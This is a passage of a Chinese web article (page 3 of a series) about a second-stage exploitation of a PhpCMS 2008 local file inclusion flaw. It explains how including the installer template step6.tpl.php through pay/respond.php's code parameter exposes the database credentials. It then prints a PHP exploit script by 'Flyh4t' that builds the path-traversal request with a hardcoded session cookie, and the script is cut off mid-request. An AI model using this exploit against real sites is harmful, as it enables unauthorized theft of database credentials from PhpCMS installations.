Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

PhpCMS一个漏洞的二次利用(3)

来源: 未知 分享至:
"myform" action="install.php?" method="post">  
  • <table width="100%" cellspacing="1" cellpadding="0" >  
  • <caption>填写数据库信息</caption>  
  • <tr>  
  • <th width="30%" align="right" >数据库服务器:</th>  
  • <td><label>  
  •   <input name="dbhost" type="text" id="dbhost" value="<?=DB_HOST?>" size="20" />  
  • </label></td>  
  • </tr>  
  • <tr>  
  • <th align="right">数据库帐号:</th>  
  • <td><input name="dbuser" type="text" id="dbuser" value="<?=DB_USER?>" size="20" /></td>  
  • </tr>  
  • <tr>  
  • <th align="right">数据库密码:</th>  
  • <td><input name="dbpw" type="password" id="dbpw" value="<?=DB_PW?>" size="20" /></td>  
  • </tr>  
  • <tr>  
  • <th align="right">数据库名称:</th>  
  • <td><input name="dbname" type="text" id="dbname" value="<?=DB_NAME?>" size="20" /></td>  
  • </tr>  
  • <tr>  
  • <th align="right">数据表前缀:</th>  
  • <td><input name="tablepre" type="text" id="tablepre" value="<?=DB_PRE?>" size="20" />  <img src="install/images/help.png" style="cursor:pointer;" title="如果一个数据库安装多个phpcms,请修改表前缀" align="absmiddle" />  
  • <span id=\'helptablepre\'></span></td>  
  • </tr> 
  •  

    DB_HOST等常量是定义在config.inc.php中的

    1. <?php  
    2. //数据库配置信息  
    3. define(\'DB_HOST\'\'localhost\'); //数据库服务器主机地址  
    4. define(\'DB_USER\'\'root\'); //数据库帐号  
    5. define(\'DB_PW\'\'\'); //数据库密码  
    6. define(\'DB_NAME\'\'\'); //数据库名 

     

    而include/common.inc.php 包含了config.inc.php,通前面所说的pay/respond.php包含了include/common.inc.php文件,所以只要利用该本地文件包含漏洞包含step6.tpl.php即可获取所有的数据库信息。附exp如下

    1. <?php  
    2. print_r(\'  
    3. +---------------------------------------------------------------------------+  
    4. Phpcms2008 datebase credentials disclosure exploit  
    5. by Flyh4t  
    6. mail: flyh4t@hotmail.com  
    7. team: http://www.wolvez.org  
    8. +---------------------------------------------------------------------------+  
    9. \');  
    10. $host =\'127.0.0.\';  
    11. $path = \'/\';  
    12. $cookie=\'PHPSESSID=8bbf19296904d6d352ebedb9a54933a3; TltHydfofMauth=UD0CDgFXVQAEWAMMWABQBwUPBVVSAFxRDQ0GVldbBA8ADQ%3D%3D; TltHydfofMcookietime=0\';  
    13. $message="GET ".$path."pay/respond.php?code=../../../install/step6.tpl HTTP/1.1";  
    14. $message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*";  
    15. $message.="Accept-Language: zh-cn";  
    16. $message.="Accept-Encoding: gzip, deflate";  
    17. $message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

    最新图文资讯
    1 2 3 4 5 6
    验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
    关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史